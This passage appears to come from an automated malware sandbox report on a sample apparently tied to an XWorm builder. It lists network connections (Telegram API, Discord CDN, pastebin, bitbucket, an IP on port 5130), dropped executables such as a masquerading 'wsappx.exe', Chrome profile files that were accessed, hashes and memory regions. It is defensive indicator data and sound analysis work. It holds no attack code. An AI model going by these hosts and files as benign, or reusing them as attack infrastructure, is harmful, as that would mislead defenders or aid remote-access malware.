| US | 8.8.8.8:53 | 227.48.178.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.129.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 233.129.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | google.com | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| US | 8.8.8.8:53 | 71.70.70.70.in-addr.arpa | udp |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| CA | 70.70.70.71:80 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| NL | 2.19.195.194:443 | assets.msn.com | tcp |
| US | 8.8.8.8:53 | 194.195.19.2.in-addr.arpa | udp |
| US | 192.178.48.227:443 | beacons.gcp.gvt2.com | udp |
| NL | 2.19.195.194:443 | assets.msn.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 140.82.112.6:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 6.112.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 140.82.112.4:443 | github.com | tcp |
| US | 8.8.8.8:53 | codeload.github.com | udp |
| US | 140.82.114.9:443 | codeload.github.com | tcp |
| US | 8.8.8.8:53 | 4.112.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.114.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | beacons.gcp.gvt2.com | udp |
| US | 192.178.48.227:443 | beacons.gcp.gvt2.com | udp |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| N/A | 127.0.0.1:7000 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.68.143:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | bitbucket.org | udp |
| US | 104.192.141.1:443 | bitbucket.org | tcp |
| US | 8.8.8.8:53 | 143.68.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.141.192.104.in-addr.arpa | udp |
| PL | 195.3.223.214:5130 | tcp |
Files
\??\pipe\crashpad_3172_OUDKHUIBEEMGJDHT
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 61de52d00605523a79a4cb625f1169d5 |
| SHA1 | ca3976880c7f4c56fb39cfa2e3c5b738893c68c3 |
| SHA256 | 59da30f4ed98904c556d5a702782acade5c747c84bdc84611efcd67900e47eb8 |
| SHA512 | 2e7b9cac57bd4fba5f9523b5ad299ebaff45944f67c8330fb325ec723c2b0a43acf64a860dbcc125e5d4b45d5bca124c86aec19a7ad23d967eae54c5b3babf72 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | f16f3cac73b98ae94ac1bb9149d5f1d7 |
| SHA1 | 0ba4e3b8d26e7552c536c8add2926aaa2f1ba2e3 |
| SHA256 | 839c086d3685195b908b5aa023417dc5f93e38b51864f912ff4b91c8cbb22bb2 |
| SHA512 | 2688a4338f5ab895cab5dcefdfe76b49843785b9ff124c8e2c585f87b1466ac9455cc7fd35d3986404e09c81e586e4a7a5b3062d3757fd419f66d4b501e171f4 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 0cf6474bfa77b98d79050f60239daecc |
| SHA1 | 498725dd04a023750b02ea396165fa7d537d6db6 |
| SHA256 | b537bed7cdc842eda4ed4acfbc75fdc4fd302b5802aef0f2cff5f068a689a7ad |
| SHA512 | 50a999093e8545339ecf5dd1c00a76e8946707ce8a17c45d70b8c759f7bee67ebe74923e41ba023c28214a55b8f74d29682da1122c9a40f79d5205b5828e9fe6 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000a
| MD5 | 3cf44eff2da9427f46f679875d873147 |
| SHA1 | ab8168e58fdd8db4749cb8c6f6a699c53af1925f |
| SHA256 | abd4b89f9916cb0673d9977dcad128b4456bae2b6036881df996ff0d40442fe3 |
| SHA512 | 03ab548b17892dd2a979bc3425904534ca97d209a67e6eeb4e1455995a60c10d99e09a3621836e9ccf3d512e34d02f2ae7654210e388bb7b7545c72eca87fa81 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000007
| MD5 | c967968a175db49d0658db25241a8dbd |
| SHA1 | 2cc09dc7d0fa17063a119f84c6b91e8031349a31 |
| SHA256 | c662a6b643cb43c5abc464afa5cc9f9484fc77535a0d4ca6c390c04d6dfde083 |
| SHA512 | dabbc31c2b9ab4aab7d24a93c4801b6a4fd5763bda43ca64d69549ec1a27f43a6fe38e4f9ea5a506868a3984d4a95eac170480c9928b8f062b2a3d8c6253c7cd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000009
| MD5 | 74368ec8b67c68703ea2666435050c84 |
| SHA1 | d33f29626f1923635bc1735cbd0212bcffea75c7 |
| SHA256 | d311a6c56d00b54e99125f07fc7ecc3b1de40d60271991736eb3398f257eb83d |
| SHA512 | 4b3d1ff745f6bc517f15800fad1dc3c285c6a545b9ac16b9fcff069f3ddcbe5a23e0e3a966e9194a3f9d38a35523df29ed6424ff9c243f65b1f90b9705c696e7 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000006
| MD5 | ce5f8af146b2bab234eaf0222bfdba4f |
| SHA1 | 5f3b11ca1261dd50aa83ff056dbdeb858d3cddea |
| SHA256 | 3eba06d8a5a66b209d8cadd7e7215290d5961d7649a458ea7c9be40acffc4ce2 |
| SHA512 | 9b2f42053ada800c33135cee04b21fa07c6f9dcb7521517be67e37956e83a0f14bc97319e4f882b3f38300ca7a9c5f3753f088cd223f3dbc5e5658a865ef59a0 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000b
| MD5 | 49943bc015e9713f646c021a2f9a7f48 |
| SHA1 | 7bcd637eb823b04c425775fa8c914e8b8f2ac2a5 |
| SHA256 | f6e0b13ad81727a0d9317a3049fd06ecf2c473060e9d6e4f8eb564a1d82ad289 |
| SHA512 | 2203c2dbe9482b0b351a3f70ea0ba9f63dcc87a66d4a4db63a060dd7dd04cb73a73bced407d57c2bcf26cf7ed78b18c7555c87b22db9bd744cb6491cd040305d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00000c
| MD5 | bd7d3718eec41214d0e6d4d828e1cfde |
| SHA1 | be505011345ac2c2f1c4776c79ec327be955dadc |
| SHA256 | 1d401b64876b2174de22d945698d3d8d750fb83e6df1e0bed01ea2569feadb7f |
| SHA512 | 875ae5cc609f0ea5bc079879c1dc56a3da4207f411e09c9456a50b0c6248ae9f4a45362a70ce4731a0484b0a821a93a60233376f254eec3f3a8611803f397f1e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | da438e7343e50afc765954e3d2b55306 |
| SHA1 | 3174b6d8cbe54353b9f0c81b1e39bf4c1fa4cd7d |
| SHA256 | 6a07811ea98f376d4ab01ce06bd9d85e2b414114782bf6ceac0e825da46ebf4b |
| SHA512 | dc1f92c1f11175cb41cd70ab8fa35807619c818d45d0b745242afcaaa657b3d8d98385405fe76885405c2f2fe933ba7900667b19e797b82336bf94f98c01b082 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 04e9419a7822a588432d6f21d9a46e05 |
| SHA1 | 0f3a3c1283f9d1ab1887c895cc504c6e4bb2fad1 |
| SHA256 | 088030c1ab14471ee13b7025f0b12329924cf6bb388e37e264e4b39df118aeee |
| SHA512 | f698846628fbc99fc61a37f1c0b3afa14c046dd67da4083affdc42da27b7ff8d8e779fb8fbbe212222e1c29bd5910d62b8fd493878a17ba11024715c8884828f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | e0633e9f41c50a83723b6eb751ec80ff |
| SHA1 | 4495e03b9210257a0d1f19afa61dedb69fed56bf |
| SHA256 | beb068f6abf8dc31605caeb6d53f88de7c31d4e0284046bd48111cceb59ad797 |
| SHA512 | 88ca9cee527f35833b1d9a7ef3874aedcbea6b7b24d466f945ad77ce06983b724cf12190a33604f03a5b17af5ff0ee2ce63f3b8eae1f997e3dcb3ce85728bc82 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json
| MD5 | 99914b932bd37a50b983c5e7c90ae93b |
| SHA1 | bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f |
| SHA256 | 44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a |
| SHA512 | 27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 6fbb5d28bcce8f5ad8fb041cf2041606 |
| SHA1 | 9399023938e4540d6196866c89dc1a6d8cd7ad42 |
| SHA256 | e0352eca0bc64acff568b15aaccea133289b00c59d63f800165436e44390ba48 |
| SHA512 | 8d6498654d5f17dfac5e2ff7b838592ff2a29cc356ddf9d8c5a7ecc9ca5cf64202a56a98d649419da1d13581c5673e87a5018a9491283471a7fa0d4e2b90d4e2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | b0e0d1b2381776d1d099fd34622f2aac |
| SHA1 | ba41e25276fed84dff5e299fd73d6e8455195ba2 |
| SHA256 | 16132fb0b8c7ad3cc7f5f3e114ff22492a2bc686d73f566626ffa48daa7e4034 |
| SHA512 | 47bccbfb1add10bda39cfb79d1c6ee5380d1c9643b87a379b30fbada35205a4db1fcf511a2723d6e2888214cc9e5326d07f196c7539dd8539b0e6272fddf80fa |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 1b6fb40c8c75f8006a9ccb1a9ef1bfe6 |
| SHA1 | 5289edd685c4b93feabcbba7242688ec0edbee3b |
| SHA256 | fee277c5e8f85a657a2f8b87fd026187bcff8b7cd88bb68d23f5b16b197d38b2 |
| SHA512 | 85cd6153a8107f53711cf54f37226bd4e897a7df4698f9fd5700b0f8ca7086a1d0360a890f4065ae7cfe5165b25e287c252f3b674a8a51db46ac6374c4caa928 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 0445a61cceaed99d86b2cd3eb9fedc0c |
| SHA1 | fa5a4c3bd5f5dddea5ffbd945477c304514d0517 |
| SHA256 | 48fcd180a256b8adb4ece153a1a12db8ce3293ccf5740f96d3a969849a789f8f |
| SHA512 | b06e21b17ed1b4aaacf5898264e8a59dba4b6c4fe9767b76b6bcb446c1c7164b648734b9156ef938ad2ca67e0fb3bbd59e2f07ec4f707a290d793eabb0df0de3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | b66dec467b8cfb4726e12a2ba3f37e80 |
| SHA1 | dd877d191c3547eabdcaf4db974c2fa15e944aab |
| SHA256 | 19b956a349da12106b9480b3f0eff42b4ea71e16d4226cb42e314bdb4703afe7 |
| SHA512 | 7615520359ddfb35ba97145de3b95302d12deb3e1631d2e4184392240f842e05d80ea7d41a074db6c2d7ba6293b8eb5b46f09bbd2618aae802412928097830fe |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 8e0da37cff56b2389a2edd1a1742d905 |
| SHA1 | 9fce02e731595d8961b81cb2600877817cbee8ec |
| SHA256 | 36f2a2bcb333a8be214624397813f4b6d79a59fb3f6fe747bc1aff7f99e5a5a0 |
| SHA512 | b11999fb171d7850b2c469b34a4d1fdc244c476ee83395a025f0ed00736313c43f9ca0b4ad3498cc4bb23e4944d5d2c9ccb1c09260e38546f462cb064799a41e |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 1871d89d49f1ae810cbb163bb5f39277 |
| SHA1 | c5b3e0b0627585e9f3a4889a94afc3c3f4d022b3 |
| SHA256 | a38f3b5805cde53250fd355087e5a3b7829f19c3f35403c9d89f83ddd0743b51 |
| SHA512 | 17e8900a64c4a67d28a3f6a56d46414f099d20aae2a0bd4545447e7e689f98bef4304152e470f9352accd581f522904501b2aa7760d18bbe882c348546af8004 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000023
| MD5 | b3651e618098746c8784d8f2feb975da |
| SHA1 | f84dc5e2231456a8eb6741f0a7d3d737d64abc14 |
| SHA256 | 78faf57d9f3ab2ef0a7acf46fac725982c6fc12602464119adcc8a13d8374c13 |
| SHA512 | ae540878b51a58b19c50ec17f1a80cb9ad242e9fda9ce8cba67c7f5f982ffd9a3befba651c45bd2efa99a78811c3ed850ec3ef27846457099ab043a48454f682 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000024
| MD5 | 569dfa01693b4852d4add224acfc22ed |
| SHA1 | af8a9f6a866f48397e5cdd99df12318b78f678c7 |
| SHA256 | bf21dd8eabc863e5a20ba122acf08f98c7b5e83f24805c71a3c2945bed8ee276 |
| SHA512 | efb9ba145c9c976774b4b4d7560134f0a19e57c1eacb304f00ecfd40986aef5a205598ab182ad2479b632e2a823a96a86fd1bb3861cea8f0ef4fdc427b1abbfa |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | d4bae190037a5633055051f64f65a510 |
| SHA1 | 9872dd3a9eb036ecc04c02a5f18ac27e35d5bcca |
| SHA256 | 70a1826a203409270af02ea429666cc1a1ca1b35d5f61c4b531de55200c55f34 |
| SHA512 | bc84339e312f650466910483f6e1565c1a23509cd18e851646e395ca9452c2e55c1080b9d174b75cc92867821bba07aabd1f1fca66bf13f88410446f70db5450 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 76e1a67813f334a6f48fb573782bbae4 |
| SHA1 | ca3a6d75b7595f0d63957fb015f0aad7b79f0dc1 |
| SHA256 | e43a10663aee46282532e57b846e031ad1cb6c4bcb436c2e67f3fec563b85083 |
| SHA512 | fd0292d05e4e7875affdb33d037594f7fcefc01cc1243467aa747f08d3a20e0d8635d426d3f0b4cdafd043af05028a8cab080189a4c140eec2704680067bb706 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | e8b6557593ebc7246a769e85cadc181f |
| SHA1 | 03dfe16bebe3247135596b86f9938cd9eb97af0d |
| SHA256 | 278f8bfe9bb174af6622b9ed5003abf516cf333e2af32e3ed46f57cd3ab99b58 |
| SHA512 | e961597c9171352b722cb7cb255d34a8d11317ade1645cf4721f4ab3cf6e5bfc98d168cc6fdf0be343b580773cfe9d04eb5a7c272910abef1a2820e84589746d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000021
| MD5 | b16fe16341cfc5d5706c5c32c74288d4 |
| SHA1 | ede08fafca0c938aac4e857f9d6695e77e50533f |
| SHA256 | 9a945fa143b6bba59643b0392b518c7b6f8588df824ea17aef80ec1051fff8ab |
| SHA512 | 7d61330b8981c39fdd68112bf1086b93fe5e196bc9b8e346aa30d27caaaa8aadd81838b8289c57ba64ccc68c99586d91d64c85ecdd57dc30f8585348c417e279 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | fbc37a25854efa623a4f233e6da79480 |
| SHA1 | acae0d578bc6d1322df8cd4290b54b94104b7eef |
| SHA256 | 49c6a528085070069d7e5bc0024c80872c872c0ded5842d7079ac9f5cbca821d |
| SHA512 | 3d3c000bf95431a63e87769a823ac0ddb5ad25675fdfaf7ce921d2b2ef0768f7b397d1cf764cb7931b03e38c98512e09227573f74c1481c2ecec87b7387038e2 |
memory/3724-834-0x0000025FA87A0000-0x0000025FA8ADE000-memory.dmp
memory/3724-836-0x00007FFE0DE00000-0x00007FFE0E8C1000-memory.dmp
memory/3724-837-0x0000025FC2FF0000-0x0000025FC3000000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\win-xworm-builder.exe
| MD5 | 835d21dc5baa96f1ce1bf6b66d92d637 |
| SHA1 | e0fb2a01a9859f0d2c983b3850c76f8512817e2d |
| SHA256 | e67f2b34ef647d59eb8ebd4a88f85dc072346ca5c275cba1ee2307b80a560319 |
| SHA512 | 747a9b6cde0207c722a62904a2c8708188f7c9e65e94cf55667e90096f1d1852e145061bd8e764bf30aaca0fb0f4355668feccc951041af735677c4c644aba87 |
C:\Users\Admin\AppData\Local\Temp\win-xworm-builder.exe
| MD5 | 835d21dc5baa96f1ce1bf6b66d92d637 |
| SHA1 | e0fb2a01a9859f0d2c983b3850c76f8512817e2d |
| SHA256 | e67f2b34ef647d59eb8ebd4a88f85dc072346ca5c275cba1ee2307b80a560319 |
| SHA512 | 747a9b6cde0207c722a62904a2c8708188f7c9e65e94cf55667e90096f1d1852e145061bd8e764bf30aaca0fb0f4355668feccc951041af735677c4c644aba87 |
C:\Users\Admin\AppData\Local\Temp\win-xworm-builder.exe
| MD5 | 835d21dc5baa96f1ce1bf6b66d92d637 |
| SHA1 | e0fb2a01a9859f0d2c983b3850c76f8512817e2d |
| SHA256 | e67f2b34ef647d59eb8ebd4a88f85dc072346ca5c275cba1ee2307b80a560319 |
| SHA512 | 747a9b6cde0207c722a62904a2c8708188f7c9e65e94cf55667e90096f1d1852e145061bd8e764bf30aaca0fb0f4355668feccc951041af735677c4c644aba87 |
C:\Users\Admin\Desktop\builder.exe
| MD5 | a21db5b6e09c3ec82f048fd7f1c4bb3a |
| SHA1 | e7ffb13176d60b79d0b3f60eaea641827f30df64 |
| SHA256 | 67d9b4b35c02a19ab364ad19e1972645eb98e24dcd6f1715d2a26229deb2ccf5 |
| SHA512 | 7caab4f21c33ef90c1104aa7256504ee40ff0a36525b15eb3d48940862346ccf90a16eef87c06d79b0ffd920beb103ed380eae45df8c9286768890b15ed1067c |
memory/1668-857-0x000002B7BD120000-0x000002B7BD1EC000-memory.dmp
memory/1668-856-0x00007FFE0DE00000-0x00007FFE0E8C1000-memory.dmp
C:\Users\Admin\Desktop\builder.exe
| MD5 | a21db5b6e09c3ec82f048fd7f1c4bb3a |
| SHA1 | e7ffb13176d60b79d0b3f60eaea641827f30df64 |
| SHA256 | 67d9b4b35c02a19ab364ad19e1972645eb98e24dcd6f1715d2a26229deb2ccf5 |
| SHA512 | 7caab4f21c33ef90c1104aa7256504ee40ff0a36525b15eb3d48940862346ccf90a16eef87c06d79b0ffd920beb103ed380eae45df8c9286768890b15ed1067c |
C:\Users\Admin\Desktop\builder.exe
| MD5 | a21db5b6e09c3ec82f048fd7f1c4bb3a |
| SHA1 | e7ffb13176d60b79d0b3f60eaea641827f30df64 |
| SHA256 | 67d9b4b35c02a19ab364ad19e1972645eb98e24dcd6f1715d2a26229deb2ccf5 |
| SHA512 | 7caab4f21c33ef90c1104aa7256504ee40ff0a36525b15eb3d48940862346ccf90a16eef87c06d79b0ffd920beb103ed380eae45df8c9286768890b15ed1067c |
memory/1668-861-0x000002B7BD5E0000-0x000002B7BD5F0000-memory.dmp
memory/4928-862-0x0000000074890000-0x0000000075040000-memory.dmp
memory/4928-863-0x0000000000C90000-0x0000000001322000-memory.dmp
memory/4928-864-0x0000000005D20000-0x0000000005DBC000-memory.dmp
memory/4928-868-0x00000000063B0000-0x0000000006954000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | c9817a3122580815cd100c769abfa820 |
| SHA1 | ee44c878da86d617d0c7fff3ab50c89985ad9264 |
| SHA256 | 6c27197854034cdaddd068f40a9517ccfd0674f3f4b25996bd5600e6ce76e080 |
| SHA512 | 8072d8ff2bd114b7b3a4bc92156b104747b8caf39b3c86b0bd8029d720b977fac9ea5c9c276f1d6cc8977734fd8cb433ae7f84584817b770ebb5916938995906 |
memory/3724-879-0x0000025FC2FC0000-0x0000025FC2FCA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmpE238.tmp.bat
| MD5 | e26f3dc7dd25e77636064f9cce98401b |
| SHA1 | 05152475ac249a3c649478d88ea5f581c3dbafcf |
| SHA256 | 32a73c6086053f221237b90477a3047cc90b19fd5a9c856d48e627665b293f55 |
| SHA512 | 35654c6dd6b215d662f48fbe7553fa15812875034ad23e60d2dd58a6e4759bcce0e0f97fc7489091bcec562e8f821b6f290e99ef9558b8da90d9da2897e4a7f2 |
memory/1668-880-0x00007FFE0DE00000-0x00007FFE0E8C1000-memory.dmp
memory/4928-884-0x0000000005E00000-0x0000000005E92000-memory.dmp
memory/3724-887-0x00007FFE0DE00000-0x00007FFE0E8C1000-memory.dmp
C:\Users\Static\wsappx.exe
| MD5 | 835d21dc5baa96f1ce1bf6b66d92d637 |
| SHA1 | e0fb2a01a9859f0d2c983b3850c76f8512817e2d |
| SHA256 | e67f2b34ef647d59eb8ebd4a88f85dc072346ca5c275cba1ee2307b80a560319 |
| SHA512 | 747a9b6cde0207c722a62904a2c8708188f7c9e65e94cf55667e90096f1d1852e145061bd8e764bf30aaca0fb0f4355668feccc951041af735677c4c644aba87 |
C:\Users\Static\wsappx.exe
| MD5 | 835d21dc5baa96f1ce1bf6b66d92d637 |
| SHA1 | e0fb2a01a9859f0d2c983b3850c76f8512817e2d |
| SHA256 | e67f2b34ef647d59eb8ebd4a88f85dc072346ca5c275cba1ee2307b80a560319 |
| SHA512 | 747a9b6cde0207c722a62904a2c8708188f7c9e65e94cf55667e90096f1d1852e145061bd8e764bf30aaca0fb0f4355668feccc951041af735677c4c644aba87 |
memory/2576-891-0x00007FFE0DE00000-0x00007FFE0E8C1000-memory.dmp
memory/3724-893-0x0000025FC2FF0000-0x0000025FC3000000-memory.dmp
memory/4928-892-0x0000000006080000-0x0000000006090000-memory.dmp
memory/4928-894-0x0000000005D10000-0x0000000005D1A000-memory.dmp
memory/4928-895-0x0000000005F00000-0x0000000005F56000-memory.dmp
memory/3724-896-0x00007FFE0DE00000-0x00007FFE0E8C1000-memory.dmp
memory/4928-897-0x0000000074890000-0x0000000075040000-memory.dmp
memory/4928-898-0x0000000006080000-0x0000000006090000-memory.dmp
memory/4928-899-0x00000000071B0000-0x0000000007216000-memory.dmp
memory/2576-900-0x00007FFE0DE00000-0x00007FFE0E8C1000-memory.dmp
memory/2124-901-0x000002325F430000-0x000002325F431000-memory.dmp
memory/2124-902-0x000002325F430000-0x000002325F431000-memory.dmp
memory/2124-903-0x000002325F430000-0x000002325F431000-memory.dmp
memory/2124-907-0x000002325F430000-0x000002325F431000-memory.dmp
memory/2124-908-0x000002325F430000-0x000002325F431000-memory.dmp
memory/2124-910-0x000002325F430000-0x000002325F431000-memory.dmp
memory/2124-909-0x000002325F430000-0x000002325F431000-memory.dmp
memory/2124-912-0x000002325F430000-0x000002325F431000-memory.dmp
memory/4928-911-0x0000000006080000-0x0000000006090000-memory.dmp
memory/2124-913-0x000002325F430000-0x000002325F431000-memory.dmp
memory/2124-914-0x000002325F430000-0x000002325F431000-memory.dmp
memory/2576-915-0x00007FFE0DE00000-0x00007FFE0E8C1000-memory.dmp
memory/4928-916-0x0000000006080000-0x0000000006090000-memory.dmp
C:\Users\Admin\Desktop\builder.exe
| MD5 | a21db5b6e09c3ec82f048fd7f1c4bb3a |
| SHA1 | e7ffb13176d60b79d0b3f60eaea641827f30df64 |
| SHA256 | 67d9b4b35c02a19ab364ad19e1972645eb98e24dcd6f1715d2a26229deb2ccf5 |
| SHA512 | 7caab4f21c33ef90c1104aa7256504ee40ff0a36525b15eb3d48940862346ccf90a16eef87c06d79b0ffd920beb103ed380eae45df8c9286768890b15ed1067c |
memory/1556-918-0x0000000074890000-0x0000000075040000-memory.dmp
memory/1556-919-0x0000000005BC0000-0x0000000005BD0000-memory.dmp
memory/1556-920-0x0000000005BC0000-0x0000000005BD0000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 2eef15964baa38dae2fa5af71207ccbb |
| SHA1 | d38afce3a3c908e5ee29e08ce763935dc09e61a6 |
| SHA256 | 66f4de48570213a73defbcc2ecf260ff0f71fb8086d5d2836f37e82bb56711b8 |
| SHA512 | 63311b0e30bddf9bc546b25aeee62ba326ef0db1880e1853a1fef4f39ae5b331c8a3494074c0e79ee48135e13549fe4d7b44fb1650b1e43ee037837de0a21b67 |
memory/1556-931-0x0000000074890000-0x0000000075040000-memory.dmp
memory/1512-933-0x0000000074890000-0x0000000075040000-memory.dmp
memory/1512-932-0x0000000000210000-0x00000000003FA000-memory.dmp
memory/1512-934-0x0000000004C60000-0x0000000004C70000-memory.dmp
memory/1512-935-0x0000000005F50000-0x0000000006174000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\1a5fdae6-8f46-4b8b-a738-d6572f690d43\AgileDotNetRT.dll
| MD5 | 14ff402962ad21b78ae0b4c43cd1f194 |
| SHA1 | f8a510eb26666e875a5bdd1cadad40602763ad72 |
| SHA256 | fb9646cb956945bdc503e69645f6b5316d3826b780d3c36738d6b944e884d15b |
| SHA512 | daa7a08bf3709119a944bce28f6ebdd24e54a22b18cd9f86a87873e958df121a3881dcdd5e162f6b4e543238c7aef20f657c9830df01d4c79290f7c9a4fcc54b |
C:\Users\Admin\AppData\Local\Temp\1a5fdae6-8f46-4b8b-a738-d6572f690d43\AgileDotNetRT.dll
| MD5 | 14ff402962ad21b78ae0b4c43cd1f194 |
| SHA1 | f8a510eb26666e875a5bdd1cadad40602763ad72 |
| SHA256 | fb9646cb956945bdc503e69645f6b5316d3826b780d3c36738d6b944e884d15b |
| SHA512 | daa7a08bf3709119a944bce28f6ebdd24e54a22b18cd9f86a87873e958df121a3881dcdd5e162f6b4e543238c7aef20f657c9830df01d4c79290f7c9a4fcc54b |
memory/1512-943-0x00000000732A0000-0x0000000073329000-memory.dmp
